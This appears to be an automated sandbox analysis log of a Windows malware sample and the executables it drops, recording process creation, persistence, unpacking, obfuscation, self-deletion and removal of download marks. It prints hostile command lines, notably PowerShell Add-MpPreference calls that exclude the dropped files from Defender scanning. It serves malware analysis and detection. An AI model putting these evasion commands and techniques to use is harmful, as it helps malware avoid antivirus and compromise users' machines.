Source: C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe Process created: C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe' /SpecialRun 4101d8 5988
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\E4D7.exe C:\Users\user\AppData\Local\Temp\E4D7.exe
Source: C:\Users\user\AppData\Local\Temp\37D8.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\37D8.exe' -Force
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\60DF.exe Process created: C:\Users\user\AppData\Local\Temp\98e85b6a-1246-45d9-ab1c-f2e36131ecec\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\98e85b6a-1246-45d9-ab1c-f2e36131ecec\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\98e85b6a-1246-45d9-ab1c-f2e36131ecec\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Local\Temp\37D8.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\DataSvcUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\DataSvcUtil.exe
Source: C:\Users\user\AppData\Local\Temp\98e85b6a-1246-45d9-ab1c-f2e36131ecec\AdvancedRun.exe Process created: C:\Users\user\AppData\Local\Temp\98e85b6a-1246-45d9-ab1c-f2e36131ecec\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\98e85b6a-1246-45d9-ab1c-f2e36131ecec\AdvancedRun.exe' /SpecialRun 4101d8 780
Source: C:\Users\user\AppData\Local\Temp\60DF.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\60DF.exe' -Force
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Roaming\csdfufc C:\Users\user\AppData\Roaming\csdfufc
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\B74C.exe C:\Users\user\AppData\Local\Temp\B74C.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\C651.exe C:\Users\user\AppData\Local\Temp\C651.exe
Source: C:\Users\user\AppData\Local\Temp\37D8.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\D083.exe C:\Users\user\AppData\Local\Temp\D083.exe
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Process created: C:\Users\user\Desktop\y8WngeDn4q.exe 'C:\Users\user\Desktop\y8WngeDn4q.exe' Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\8908.exe C:\Users\user\AppData\Local\Temp\8908.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\37D8.exe C:\Users\user\AppData\Local\Temp\37D8.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\3FD8.exe C:\Users\user\AppData\Local\Temp\3FD8.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\4EDC.exe C:\Users\user\AppData\Local\Temp\4EDC.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\60DF.exe C:\Users\user\AppData\Local\Temp\60DF.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\6E1E.exe C:\Users\user\AppData\Local\Temp\6E1E.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\esdfufc Process created: C:\Users\user\AppData\Roaming\esdfufc C:\Users\user\AppData\Roaming\esdfufc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8908.exe Process created: C:\Users\user\AppData\Local\Temp\8908.exe C:\Users\user\AppData\Local\Temp\8908.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37D8.exe Process created: C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37D8.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\37D8.exe' -Force Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37D8.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\DataSvcUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\DataSvcUtil.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37D8.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\60DF.exe Process created: C:\Users\user\AppData\Local\Temp\98e85b6a-1246-45d9-ab1c-f2e36131ecec\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\98e85b6a-1246-45d9-ab1c-f2e36131ecec\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\98e85b6a-1246-45d9-ab1c-f2e36131ecec\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\60DF.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\60DF.exe' -Force Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe Process created: C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe' /SpecialRun 4101d8 5988
Source: C:\Users\user\AppData\Local\Temp\98e85b6a-1246-45d9-ab1c-f2e36131ecec\AdvancedRun.exe Process created: C:\Users\user\AppData\Local\Temp\98e85b6a-1246-45d9-ab1c-f2e36131ecec\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\98e85b6a-1246-45d9-ab1c-f2e36131ecec\AdvancedRun.exe' /SpecialRun 4101d8 780
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe Code function: 25_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification, 25_2_00408FC9
Source: C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe Code function: 28_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification, 28_2_00408FC9
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\8908.tmp Jump to behavior
Source: 60DF.exe, 00000018.00000000.509231538.0000000000442000.00000002.00020000.sdmp, 60DF.exe.6.dr Binary or memory string: INSERT INTO [dbo].[Details] ([Employee Id], [Title], [First Name], [Last Name], [Email], [Phone Number], [Hire Date], [Date of Birth], [Basic Pay], [House Rental Allowance], [Dearness Allowance], [Provident Fund], [Date of Leaving], [Grade]) VALUES (@Employee_Id, @Title, @First_Name, @Last_Name, @Email, @Phone_Number, @Hire_Date, @Date_of_Birth, @Basic_Pay, @House_Rental_Allowance, @Dearness_Allowance, @Provident_Fund, @Date_of_Leaving, @Grade);
Source: sqlite3.dll.29.dr Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: sqlite3.dll.29.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: 60DF.exe, 00000018.00000000.509231538.0000000000442000.00000002.00020000.sdmp, 60DF.exe.6.dr Binary or memory string: UPDATE [dbo].[Details] SET [Employee Id] = @Employee_Id, [Title] = @Title, [First Name] = @First_Name, [Last Name] = @Last_Name, [Email] = @Email, [Phone Number] = @Phone_Number, [Hire Date] = @Hire_Date, [Date of Birth] = @Date_of_Birth, [Basic Pay] = @Basic_Pay, [House Rental Allowance] = @House_Rental_Allowance, [Dearness Allowance] = @Dearness_Allowance, [Provident Fund] = @Provident_Fund, [Date of Leaving] = @Date_of_Leaving, [Grade] = @Grade WHERE (([Employee Id] = @Original_Employee_Id) AND ([Title] = @Original_Title) AND ([First Name] = @Original_First_Name) AND ([Last Name] = @Original_Last_Name) AND ((@IsNull_Phone_Number = 1 AND [Phone Number] IS NULL) OR ([Phone Number] = @Original_Phone_Number)) AND ([Hire Date] = @Original_Hire_Date) AND ([Date of Birth] = @Original_Date_of_Birth) AND ([Basic Pay] = @Original_Basic_Pay) AND ((@IsNull_House_Rental_Allowance = 1 AND [House Rental Allowance] IS NULL) OR ([House Rental Allowance] = @Original_House_Rental_Allowance)) AND ((@IsNull_Dearness_Allowance = 1 AND [Dearness Allowance] IS NULL) OR ([Dearness Allowance] = @Original_Dearness_Allowance)) AND ((@IsNull_Provident_Fund = 1 AND [Provident Fund] IS NULL) OR ([Provident Fund] = @Original_Provident_Fund)) AND ((@IsNull_Date_of_Leaving = 1 AND [Date of Leaving] IS NULL) OR ([Date of Leaving] = @Original_Date_of_Leaving)) AND ([Grade] = @Original_Grade));
Source: sqlite3.dll.29.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: sqlite3.dll.29.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: sqlite3.dll.29.dr Binary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: sqlite3.dll.29.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: sqlite3.dll.29.dr Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: C:\Users\user\AppData\Local\Temp\37D8.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3FD8.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\60DF.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe Code function: 25_2_004095FD CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle, 25_2_004095FD
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5032:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6248:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Command line argument: \H 27_2_0043C2B0
Source: C:\Users\user\AppData\Local\Temp\37D8.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37D8.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3FD8.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3FD8.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\60DF.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\60DF.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E4D7.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\E4D7.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\Temp\37D8.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: y8WngeDn4q.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: y8WngeDn4q.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: y8WngeDn4q.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: y8WngeDn4q.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: y8WngeDn4q.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: y8WngeDn4q.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: y8WngeDn4q.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\vojos\fuw.pdb source: 4EDC.exe, 00000016.00000002.528243755.0000000000417000.00000002.00020000.sdmp, csdfufc.6.dr
Source: Binary string: C:\pewa75 firecogiw\gugegowul49\geresegate_micicipu.pdbp source: DAA6.exe.6.dr
Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: AdvancedRun.exe, 00000019.00000002.527231593.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000001C.00000002.528560998.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000021.00000002.570535756.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000024.00000000.565833998.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.19.dr
Source: Binary string: C:\pewa75 firecogiw\gugegowul49\geresegate_micicipu.pdb source: DAA6.exe.6.dr
Source: Binary string: C:\ciwomo siju28 nijohon\93-loze\2.pdb source: 6E1E.exe, gbdfufc.6.dr
Source: Binary string: +C:\tuy.pdb` source: y8WngeDn4q.exe
Source: Binary string: C:\lewusukoviv.pdb source: FBAD.exe.6.dr
Source: Binary string: C:\tuy.pdb source: y8WngeDn4q.exe
Source: Binary string: wntdll.pdbUGP source: 4EDC.exe, 00000016.00000002.530995436.000000006BFE1000.00000020.00020000.sdmp, 1105.tmp.22.dr
Source: Binary string: wntdll.pdb source: 4EDC.exe, 1105.tmp.22.dr
Source: Binary string: `C:\ciwomo siju28 nijohon\93-loze\2.pdb` source: 6E1E.exe, 0000001B.00000000.521192744.0000000000401000.00000020.00020000.sdmp, gbdfufc.6.dr
Source: Binary string: bC:\ciyomolibit\vowudavumaz68\fubevu\vatatageh\yayawav\duji.pdb` source: E4D7.exe.6.dr
Source: Binary string: :C:\venu4-divilavujar1.pdb` source: B74C.exe.6.dr
Source: Binary string: C:\lewusukoviv.pdb` source: FBAD.exe.6.dr
Source: Binary string: C:\tosofom\yopuk.pdb source: C651.exe.6.dr
Source: Binary string: C:\venu4-divilavujar1.pdb source: B74C.exe.6.dr
Source: Binary string: d:\Projects\WinRAR\SFX\build\sfxzip32\Release\sfxzip.pdb source: E11F.exe.6.dr
Source: Binary string: C:\ciyomolibit\vowudavumaz68\fubevu\vatatageh\yayawav\duji.pdb source: E4D7.exe.6.dr

Data Obfuscation:

barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Temp\E4D7.exe Unpacked PE file: 29.2.E4D7.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\C651.exe Unpacked PE file: 41.2.C651.exe.400000.0.unpack
Detected unpacking (changes PE section rights)
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Unpacked PE file: 22.2.4EDC.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.cipizi:R;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Unpacked PE file: 27.2.6E1E.exe.400000.0.unpack .text:ER;.data:W;.daya:W;.rsrc:R;.reloc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\E4D7.exe Unpacked PE file: 29.2.E4D7.exe.400000.0.unpack .text:ER;.data:W;.vif:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\C651.exe Unpacked PE file: 41.2.C651.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.xoj:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
.NET source code contains potential unpacker
Source: 3AE.exe.6.dr, SimplePaint/FrmMain.cs .Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_00402E54 push eax; ret 22_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_00402E63 push eax; ret 22_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_00402665 push cs; ret 22_2_0040266B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_0040290C push eax; iretd 22_2_0040290D
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_00402E16 push eax; ret 22_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_00402DC0 push eax; ret 22_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_00402DD8 push eax; ret 22_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_00402DE8 push eax; ret 22_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_00402DF1 push eax; ret 22_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_00402E82 push eax; ret 22_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_00402E85 push eax; ret 22_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_00402D92 push eax; ret 22_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_00402E95 push eax; ret 22_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_00401D9A pushad ; ret 22_2_00401DA3
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_00402E9C push eax; ret 22_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C05D0D1 push ecx; ret 22_2_6C05D0E4
Source: C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe Code function: 25_2_0040B550 push eax; ret 25_2_0040B564
Source: C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe Code function: 25_2_0040B550 push eax; ret 25_2_0040B58C
Source: C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe Code function: 25_2_0040B50D push ecx; ret 25_2_0040B51D
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: 27_2_00401A61 push ds; retf 27_2_00401A69
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: 27_2_00401569 push edx; iretd 27_2_004015D2
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: 27_2_00401569 push edx; iretd 27_2_004015EB
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: 27_2_00402874 push esp; iretd 27_2_00402875
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: 27_2_00401575 push edx; iretd 27_2_004015D2
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: 27_2_00402F19 push eax; ret 27_2_00402FEA
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: 27_2_004015D3 push edx; iretd 27_2_004015EB
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: 27_2_004026D8 push ds; retf 27_2_004026DC
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: 27_2_00401580 push edx; iretd 27_2_004015D2
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: 27_2_00401981 push ebx; retf 27_2_00401982
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: 27_2_00401591 push edx; iretd 27_2_004015D2
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: 27_2_00401595 push edx; iretd 27_2_004015D2
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Code function: 0_2_00426B60 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_00426B60
Binary contains a suspicious time stamp
Source: 37D8.exe.6.dr Static PE information: 0x8B87D1F5 [Mon Mar 7 03:28:53 2044 UTC]
PE file contains sections with non-standard names
Source: y8WngeDn4q.exe Static PE information: section name: .zegu
Source: 4EDC.exe.6.dr Static PE information: section name: .cipizi
Source: 8908.exe.6.dr Static PE information: section name: .zegu
Source: C651.exe.6.dr Static PE information: section name: .xoj
Source: B74C.exe.6.dr Static PE information: section name: .yopu
Source: E4D7.exe.6.dr Static PE information: section name: .vif
Source: 6E1E.exe.6.dr Static PE information: section name: .daya
Source: esdfufc.6.dr Static PE information: section name: .zegu
Source: csdfufc.6.dr Static PE information: section name: .cipizi
Source: gbdfufc.6.dr Static PE information: section name: .daya
PE file contains an invalid checksum
Source: 60DF.exe.6.dr Static PE information: real checksum: 0x2bdee should be: 0x3529c
Source: 37D8.exe.6.dr Static PE information: real checksum: 0x8ddc4 should be: 0x7fd66
Source: 3FD8.exe.6.dr Static PE information: real checksum: 0x10f50 should be: 0x5be1
Source: 3AE.exe.6.dr Static PE information: real checksum: 0x0 should be: 0x4147a
Source: E11F.exe.6.dr Static PE information: real checksum: 0x0 should be: 0x114b9d
Source: initial sample Static PE information: section name: .text entropy: 6.98983847511
Source: initial sample Static PE information: section name: .text entropy: 7.85713092672
Source: initial sample Static PE information: section name: .text entropy: 7.38549549306
Source: initial sample Static PE information: section name: .text entropy: 7.29655075024
Source: initial sample Static PE information: section name: .text entropy: 6.98983847511
Source: initial sample Static PE information: section name: .text entropy: 7.8779018043
Source: initial sample Static PE information: section name: .text entropy: 7.83302446106
Source: initial sample Static PE information: section name: .text entropy: 7.66753616933
Source: initial sample Static PE information: section name: .text entropy: 7.86107035261
Source: initial sample Static PE information: section name: .text entropy: 7.66469899227
Source: initial sample Static PE information: section name: .text entropy: 7.79620991915
Source: initial sample Static PE information: section name: .text entropy: 6.98189062284
Source: initial sample Static PE information: section name: .text entropy: 6.98983847511
Source: initial sample Static PE information: section name: .text entropy: 7.38549549306
Source: initial sample Static PE information: section name: .text entropy: 6.98189062284

Persistence and Installation Behavior:

barindex
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\esdfufc Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\csdfufc Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\gbdfufc Jump to dropped file
Drops PE files
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\B74C.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\3AE.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\60DF.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\6E1E.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe File created: C:\Users\user\AppData\Local\Temp\1105.tmp Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\4EDC.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\3FD8.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\FBAD.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\37D8.exe File created: C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\C651.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\FC0C.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\gbdfufc Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\esdfufc Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\8908.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\E4D7.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\E11F.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\37D8.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\DAA6.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\csdfufc Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\60DF.exe File created: C:\Users\user\AppData\Local\Temp\98e85b6a-1246-45d9-ab1c-f2e36131ecec\AdvancedRun.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\D083.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\E4D7.exe File created: C:\Users\user\AppData\LocalLow\sqlite3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe Code function: 25_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle, 25_2_00401306

Hooking and other Techniques for Hiding and Protection:

barindex
DLL reload attack detected
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Module Loaded: Original DLL: C:\USERS\user\APPDATA\LOCAL\TEMP\1105.TMP reload: C:\WINDOWS\SYSWOW64\NTDLL.DLL
Deletes itself after installation
Source: C:\Windows\explorer.exe File deleted: c:\users\user\desktop\y8wngedn4q.exe Jump to behavior
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\esdfufc:Zone.Identifier read attributes | delete Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
